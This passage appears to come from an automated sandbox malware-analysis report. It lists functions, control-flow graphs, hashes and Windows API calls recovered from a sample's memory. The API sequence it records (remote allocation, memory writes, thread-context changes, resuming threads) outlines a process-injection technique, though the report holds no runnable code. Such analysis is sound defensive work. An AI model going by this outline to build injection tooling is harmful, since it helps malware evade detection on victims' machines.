                                                            control_flow_graph 77 70696f4-7069795 79 7069797-70697a1 77->79 80 70697ce-70697ee 77->80 79->80 81 70697a3-70697a5 79->81 87 7069827-7069856 80->87 88 70697f0-70697fa 80->88 82 70697a7-70697b1 81->82 83 70697c8-70697cb 81->83 85 70697b5-70697c4 82->85 86 70697b3 82->86 83->80 85->85 90 70697c6 85->90 86->85 96 706988f-7069949 CreateProcessA 87->96 97 7069858-7069862 87->97 88->87 89 70697fc-70697fe 88->89 91 7069800-706980a 89->91 92 7069821-7069824 89->92 90->83 94 706980e-706981d 91->94 95 706980c 91->95 92->87 94->94 98 706981f 94->98 95->94 108 7069952-70699d8 96->108 109 706994b-7069951 96->109 97->96 99 7069864-7069866 97->99 98->92 101 7069868-7069872 99->101 102 7069889-706988c 99->102 103 7069876-7069885 101->103 104 7069874 101->104 102->96 103->103 106 7069887 103->106 104->103 106->102 119 70699da-70699de 108->119 120 70699e8-70699ec 108->120 109->108 119->120 121 70699e0 119->121 122 70699ee-70699f2 120->122 123 70699fc-7069a00 120->123 121->120 122->123 126 70699f4 122->126 124 7069a02-7069a06 123->124 125 7069a10-7069a14 123->125 124->125 127 7069a08 124->127 128 7069a26-7069a2d 125->128 129 7069a16-7069a1c 125->129 126->123 127->125 130 7069a44 128->130 131 7069a2f-7069a3e 128->131 129->128 133 7069a45 130->133 131->130 133->133
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07069936
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 4ab942837c85a6e887e801a8f33444fa3ac6b7fd42fc2bc9190fef8e5443544c
                                                            • Instruction ID: 001514419d423a531f67a7207689dffb6231ad65e894752ab084274903bbf4c0
                                                            • Opcode Fuzzy Hash: 4ab942837c85a6e887e801a8f33444fa3ac6b7fd42fc2bc9190fef8e5443544c
                                                            • Instruction Fuzzy Hash: 12A15CB1D1021ACFEB54CFA8C8557EDBBF2BF48710F1486A9D848A7240D774A985CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07069700 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 134 7069700-7069795 136 7069797-70697a1 134->136 137 70697ce-70697ee 134->137 136->137 138 70697a3-70697a5 136->138 144 7069827-7069856 137->144 145 70697f0-70697fa 137->145 139 70697a7-70697b1 138->139 140 70697c8-70697cb 138->140 142 70697b5-70697c4 139->142 143 70697b3 139->143 140->137 142->142 147 70697c6 142->147 143->142 153 706988f-7069949 CreateProcessA 144->153 154 7069858-7069862 144->154 145->144 146 70697fc-70697fe 145->146 148 7069800-706980a 146->148 149 7069821-7069824 146->149 147->140 151 706980e-706981d 148->151 152 706980c 148->152 149->144 151->151 155 706981f 151->155 152->151 165 7069952-70699d8 153->165 166 706994b-7069951 153->166 154->153 156 7069864-7069866 154->156 155->149 158 7069868-7069872 156->158 159 7069889-706988c 156->159 160 7069876-7069885 158->160 161 7069874 158->161 159->153 160->160 163 7069887 160->163 161->160 163->159 176 70699da-70699de 165->176 177 70699e8-70699ec 165->177 166->165 176->177 178 70699e0 176->178 179 70699ee-70699f2 177->179 180 70699fc-7069a00 177->180 178->177 179->180 183 70699f4 179->183 181 7069a02-7069a06 180->181 182 7069a10-7069a14 180->182 181->182 184 7069a08 181->184 185 7069a26-7069a2d 182->185 186 7069a16-7069a1c 182->186 183->180 184->182 187 7069a44 185->187 188 7069a2f-7069a3e 185->188 186->185 190 7069a45 187->190 188->187 190->190
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07069936
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 118e03bf72371b5e99c905e27db9804be7c0dd4135d430375e4faf5c16d86a97
                                                            • Instruction ID: f7bb0a35db4b2d31aef3673cbf625bb53e14cbf39257b09975f5959fac2dcf77
                                                            • Opcode Fuzzy Hash: 118e03bf72371b5e99c905e27db9804be7c0dd4135d430375e4faf5c16d86a97
                                                            • Instruction Fuzzy Hash: 47915BB1D1021ACFEB54CFA9C8557EDBBF2BF48710F148269E848A7240D774A985CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010AAE30 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 191 10aae30-10aae3f 192 10aae6b-10aae6f 191->192 193 10aae41-10aae4e call 10a9838 191->193 195 10aae83-10aaec4 192->195 196 10aae71-10aae7b 192->196 199 10aae50 193->199 200 10aae64 193->200 202 10aaed1-10aaedf 195->202 203 10aaec6-10aaece 195->203 196->195 246 10aae56 call 10ab0b8 199->246 247 10aae56 call 10ab0c8 199->247 200->192 204 10aaf03-10aaf05 202->204 205 10aaee1-10aaee6 202->205 203->202 209 10aaf08-10aaf0f 204->209 207 10aaee8-10aaeef call 10aa814 205->207 208 10aaef1 205->208 206 10aae5c-10aae5e 206->200 210 10aafa0-10ab060 206->210 212 10aaef3-10aaf01 207->212 208->212 213 10aaf1c-10aaf23 209->213 214 10aaf11-10aaf19 209->214 241 10ab068-10ab093 GetModuleHandleW 210->241 242 10ab062-10ab065 210->242 212->209 216 10aaf30-10aaf39 call 10aa824 213->216 217 10aaf25-10aaf2d 213->217 214->213 222 10aaf3b-10aaf43 216->222 223 10aaf46-10aaf4b 216->223 217->216 222->223 224 10aaf69-10aaf6d 223->224 225 10aaf4d-10aaf54 223->225 230 10aaf73-10aaf76 224->230 225->224 227 10aaf56-10aaf66 call 10aa834 call 10aa844 225->227 227->224 232 10aaf78-10aaf96 230->232 233 10aaf99-10aaf9f 230->233 232->233 243 10ab09c-10ab0b0 241->243 244 10ab095-10ab09b 241->244 242->241 244->243 246->206 247->206
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 010AB086
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: fbcdd56a407e9eee97dc550e865230d33b2b280252b207fc5e8203ddcc5f382b
                                                            • Instruction ID: d3e6e50fc374a74ffb2c3b49e86126f18e0b9ef2304eb43d32df007245ec62cd
                                                            • Opcode Fuzzy Hash: fbcdd56a407e9eee97dc550e865230d33b2b280252b207fc5e8203ddcc5f382b
                                                            • Instruction Fuzzy Hash: F88124B0A00B05CFDB64DFA9D04079ABBF1FF88300F10892DD59A97A90D775E946CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02DB1CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 248 2db1cf0-2db1d56 249 2db1d58-2db1d5e 248->249 250 2db1d61-2db1d68 248->250 249->250 251 2db1d6a-2db1d70 250->251 252 2db1d73-2db1dab 250->252 251->252 253 2db1db3-2db1e12 CreateWindowExW 252->253 254 2db1e1b-2db1e53 253->254 255 2db1e14-2db1e1a 253->255 259 2db1e60 254->259 260 2db1e55-2db1e58 254->260 255->254 261 2db1e61 259->261 260->259 261->261
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02DB1E02
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2104051173.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 176ed06f579c2a74bea8e88b72ffab37bb9f0bd78b17f748cb0203acf896d74c
                                                            • Instruction ID: 436a7d6f901d4731aa1d201242e3e6c09e4d48e78fd3389722147ce95a1ab651
                                                            • Opcode Fuzzy Hash: 176ed06f579c2a74bea8e88b72ffab37bb9f0bd78b17f748cb0203acf896d74c
                                                            • Instruction Fuzzy Hash: 4E41CFB1D00359DFDB15CF9AC994ADEBBB5BF48310F24822AE819AB310D774A845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02DB0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 262 2db0bfc 263 2db0c01-2db0c06 262->263 265 2db0bf1-2db0bf4 263->265 266 2db0c07 263->266 267 2db0bf6-2db0c00 265->267 268 2db0c54-2db0c56 265->268 269 2db42c0-2db42fc 266->269 267->263 272 2db0c41-2db0c47 268->272 273 2db0c57-2db0c5b 268->273 270 2db43ac-2db43cc call 2db0ad4 269->270 271 2db4302-2db4307 269->271 292 2db43cf-2db43dc 270->292 274 2db435a-2db4392 CallWindowProcW 271->274 275 2db4309-2db4340 271->275 288 2db0c51 272->288 278 2db0c5d 273->278 279 2db0c15-2db0c16 273->279 280 2db439b-2db43aa 274->280 281 2db4394-2db439a 274->281 297 2db4349-2db4358 275->297 298 2db4342-2db4348 275->298 284 2db0c08-2db0c0a 278->284 285 2db0c5f-2db0c66 278->285 279->263 286 2db0c17-2db0c1b 279->286 280->292 281->280 293 2db0c11 284->293 287 2db0c68-2db0c6b 285->287 285->288 289 2db0c1d-2db0c20 286->289 290 2db0bd5-2db0bde 286->290 294 2db0c6d-2db0c73 287->294 295 2db0c25-2db0c26 287->295 288->268 296 2db0c21 289->296 300 2db0be5-2db0bef 290->300 293->279 294->269 295->293 301 2db0c27-2db0c2b 295->301 296->295 297->292 298->297 300->265 301->300 302 2db0c2d-2db0c36 301->302 302->296 304 2db0c38-2db0c3a 302->304 304->272
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 02DB4381
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2104051173.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2db0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: cbba0a3accf20d2dd1f64d93e890b54434c13771278baaaf1d98ba3676c08d79
                                                            • Instruction ID: f964de413373c88f65efd90de67eb56448f32b88dbfc7d3a694b5814c63cb3ae
                                                            • Opcode Fuzzy Hash: cbba0a3accf20d2dd1f64d93e890b54434c13771278baaaf1d98ba3676c08d79
                                                            • Instruction Fuzzy Hash: 504126B4900309DFDB14CF99C4A8AAEBBF5FF88314F288459D559AB321D774A841CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010A449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 305 10a449c-10a59d9 CreateActCtxA 308 10a59db-10a59e1 305->308 309 10a59e2-10a5a3c 305->309 308->309 316 10a5a4b-10a5a4f 309->316 317 10a5a3e-10a5a41 309->317 318 10a5a60 316->318 319 10a5a51-10a5a5d 316->319 317->316 320 10a5a61 318->320 319->318 320->320
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 010A59C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: f91f9d12139742ac733229ab6b7324fc8416b6a1523326fedbb1df7eb87b34e4
                                                            • Instruction ID: 895d99c81f195a294ee5d1c0e84404e0dde3f950b48f4d14dca52d4884a875f5
                                                            • Opcode Fuzzy Hash: f91f9d12139742ac733229ab6b7324fc8416b6a1523326fedbb1df7eb87b34e4
                                                            • Instruction Fuzzy Hash: F641E270C0071DCBDB24DFA9C884B8EBBF5BF49304F60816AD448AB255D7755946CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010A590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 322 10a590c-10a590f 323 10a591c-10a59d9 CreateActCtxA 322->323 325 10a59db-10a59e1 323->325 326 10a59e2-10a5a3c 323->326 325->326 333 10a5a4b-10a5a4f 326->333 334 10a5a3e-10a5a41 326->334 335 10a5a60 333->335 336 10a5a51-10a5a5d 333->336 334->333 337 10a5a61 335->337 336->335 337->337
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 010A59C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 83dc21097f4ff7d436243975f8688032423102b9120fe700b4a44c6c7a7ffd6b
                                                            • Instruction ID: 4f4f858cee06cce263ffb54dad034e7e4749b6e84d5bfc09c42a995719868533
                                                            • Opcode Fuzzy Hash: 83dc21097f4ff7d436243975f8688032423102b9120fe700b4a44c6c7a7ffd6b
                                                            • Instruction Fuzzy Hash: B341EEB0D00719CBEB24DFAAC9847CEBBF1BF89304F20805AD448AB264DB755946CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07069473 Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 339 7069473-70694c6 342 70694d6-7069515 WriteProcessMemory 339->342 343 70694c8-70694d4 339->343 345 7069517-706951d 342->345 346 706951e-706954e 342->346 343->342 345->346
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07069508
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: cb7fdd5752b910ba1734914a84046bcffd295b6ff0ce5a8b423fd49e88054bb2
                                                            • Instruction ID: b7f5654967ec61a2fa0b8478bb3fedbc202d4616142c850f9d00047b31ff69f8
                                                            • Opcode Fuzzy Hash: cb7fdd5752b910ba1734914a84046bcffd295b6ff0ce5a8b423fd49e88054bb2
                                                            • Instruction Fuzzy Hash: CB2115B1900359DFDB10CFAAC985BDEBBF5FF48310F108429E918A7240D778A954CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07069478 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 350 7069478-70694c6 352 70694d6-7069515 WriteProcessMemory 350->352 353 70694c8-70694d4 350->353 355 7069517-706951d 352->355 356 706951e-706954e 352->356 353->352 355->356
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07069508
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 79010873f4b5bb966d889d9ec0b816eec325ff6e883d967b157f01b571ec940e
                                                            • Instruction ID: e4062e24400093ff8a032a1b9815daabe028c7588b88cfb11925c77ab972e692
                                                            • Opcode Fuzzy Hash: 79010873f4b5bb966d889d9ec0b816eec325ff6e883d967b157f01b571ec940e
                                                            • Instruction Fuzzy Hash: F82126B1900359DFDB10CFAAC985BDEBBF5FF48310F108429E918A7240D778A954CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010AD2F8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 360 10ad2f8-10ad2fe 361 10ad300-10ad394 DuplicateHandle 360->361 362 10ad39d-10ad3ba 361->362 363 10ad396-10ad39c 361->363 363->362
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010AD387
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: e1bf909b9900f2e16d80eae8893c935b4f16dbbba2a4b3e2c6b56c77df48f063
                                                            • Instruction ID: 9f3b182d9c35f058868388394e628902a93fd8ed38d9c09d40f7b53fe5425160
                                                            • Opcode Fuzzy Hash: e1bf909b9900f2e16d80eae8893c935b4f16dbbba2a4b3e2c6b56c77df48f063
                                                            • Instruction Fuzzy Hash: AF21E6B5900248DFDB10CF9AD985ADEBFF4FB48310F14841AE958A7310D378A954CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07069560 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070695E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: efd4b05a0097f56f6c3b9b03584cf343521d1d0f564eb4db8f916068b9c5d70c
                                                            • Instruction ID: 54e64764754cf5d2e5e61c4701bbfc634261d8687d77e8579c370248a46a0de5
                                                            • Opcode Fuzzy Hash: efd4b05a0097f56f6c3b9b03584cf343521d1d0f564eb4db8f916068b9c5d70c
                                                            • Instruction Fuzzy Hash: E521F6B19003599FDB10CFAAC885AEEBBF5FF48310F10842AE518A7240D7399914DF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070692D8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 380 70692d8-706932b 383 706932d-7069339 380->383 384 706933b-706936b Wow64SetThreadContext 380->384 383->384 386 7069374-70693a4 384->386 387 706936d-7069373 384->387 387->386
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0706935E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 48a86862693b594dc72d72b894741acb2786e71a7faf873b632e960b8ddb05f6
                                                            • Instruction ID: c13c48c218ce331218c168274bfe27cc1419be0d73f03632d2e90326944bd474
                                                            • Opcode Fuzzy Hash: 48a86862693b594dc72d72b894741acb2786e71a7faf873b632e960b8ddb05f6
                                                            • Instruction Fuzzy Hash: 742138B19103199FDB10CFAAC4857EEBBF4EF88310F14842ED519A7240DB78A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07068D91 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 366 7068d91-7068d9d 367 7068d9f-7068dc7 366->367 368 7068e08-7068e67 ResumeThread 366->368 371 7068dce-7068de2 367->371 372 7068dc9 367->372 374 7068e70-7068e95 368->374 375 7068e69-7068e6f 368->375 372->371 375->374
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: e2dc9febf82f847f6a92853e82e597fe69258a734ba245f2c5628c745a22ebe9
                                                            • Instruction ID: d0ce2c60ff10c8efed6540b3dac1085fc37d7cb79784f4977aa2e1516a5aedea
                                                            • Opcode Fuzzy Hash: e2dc9febf82f847f6a92853e82e597fe69258a734ba245f2c5628c745a22ebe9
                                                            • Instruction Fuzzy Hash: 9C2195B1D002498FDF14CFA9C4453EEBBF0EF88314F20855AC428AB390CB399A42CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 07069568 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070695E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: c193e55a2350b741fab890130504945794c6272d5b4b349222ba62260f590b12
                                                            • Instruction ID: 9df55f36b343a88cbe8cbbcc8ea5d1eed47be66c7eba7eaf4db1f336baa5b6b1
                                                            • Opcode Fuzzy Hash: c193e55a2350b741fab890130504945794c6272d5b4b349222ba62260f590b12
                                                            • Instruction Fuzzy Hash: BE2128B1800359DFDB10CFAAC885BEEBBF5FF48310F108429E518A7240D7399504CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070692E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0706935E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 6f8397bbc3db92360c4715c5fbba806a4ef69c42d2f86d8e7ceb3857702dd5ba
                                                            • Instruction ID: ad27d18c639039c4ed81757de3a9c6efb0d3132dc26bd61c273d1fcdc07a9593
                                                            • Opcode Fuzzy Hash: 6f8397bbc3db92360c4715c5fbba806a4ef69c42d2f86d8e7ceb3857702dd5ba
                                                            • Instruction Fuzzy Hash: E22147B19003199FDB10CFAAC4857EEBBF4EF88310F14842ED519A7240DB78A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010AD300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010AD387
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 75bd87eb266fe0e37b654676e41ef030afea6b072b96c0882bbda81d6112daca
                                                            • Instruction ID: 78e9e2d6beef8f68cba7c003c5942c7b6721067ac536dd01f419e5220efc1ee0
                                                            • Opcode Fuzzy Hash: 75bd87eb266fe0e37b654676e41ef030afea6b072b96c0882bbda81d6112daca
                                                            • Instruction Fuzzy Hash: 3921C4B5900249DFDB10CFAAD984ADEBFF8EB48310F14841AE958A7350D378A954CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 070693B0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07069426
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107751159.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7060000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: ef9cef21b6c4736bb64654c7f699398b385fb09574f319dea661f8fbb2668af0
                                                            • Instruction ID: ac174df16dde2bd10c3d04a675985a94b75bb17e8730627633f486cc60df0ee3
                                                            • Opcode Fuzzy Hash: ef9cef21b6c4736bb64654c7f699398b385fb09574f319dea661f8fbb2668af0
                                                            • Instruction Fuzzy Hash: F61106719003499FDF10DFAAC845BDFBBF5AF88310F148419E919A7250C775A550CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010AA870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010AB101,00000800,00000000,00000000), ref: 010AB312
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: f562c546dccfa5668ad43870c8f684c2ca5ccdd2706da19cda1bcbbaa290ef49
                                                            • Instruction ID: 8f642d6efbed8cf00e9a87077051341271e0d44738a93bc31328d9f38e9b9d86
                                                            • Opcode Fuzzy Hash: f562c546dccfa5668ad43870c8f684c2ca5ccdd2706da19cda1bcbbaa290ef49
                                                            • Instruction Fuzzy Hash: 7A1114B6800349DFDB10CF9AD444ADEFBF4EF48310F10842AD959A7200C375A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 010AB2A1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,010AB101,00000800,00000000,00000000), ref: 010AB312
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2102666893.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a0000_oBMlky3Rkm7h5QK.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 9ce5446c417f509bca4255d13c319a40aab81e8d9badb33340aa35234ad0e514
